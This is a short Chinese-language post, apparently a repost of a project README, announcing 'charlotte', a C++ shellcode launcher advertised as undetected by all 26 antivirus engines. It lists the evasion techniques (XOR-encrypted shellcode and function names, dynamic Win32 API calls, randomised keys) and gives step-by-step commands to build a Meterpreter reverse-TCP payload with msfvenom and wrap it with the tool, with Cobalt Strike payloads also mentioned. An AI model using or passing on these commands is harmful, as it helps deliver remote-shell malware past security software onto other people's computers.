2021年5月13日:

c++ shellcode啟動器,截至2021年5月13日,0/26完全未被檢測到。
win32 api函數的動態調用
shellcode和函數名的異或加密
每次運行隨機XOR鍵和變量
在KaliLinux上,只需'apt-get install mingw-w64*'就可以了!

2021年5月17日:

隨機字符串長度和XOR鍵長度

使用

git clone存儲庫,生成命名為beacon.bin的shellcode文件,然后運行charlotte.py

注:使用msfvenom -p測試以及CobaltStrike原始格式Payload!


git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
python charlotte.py

下載地址

https://github.com/9emin1/charlotte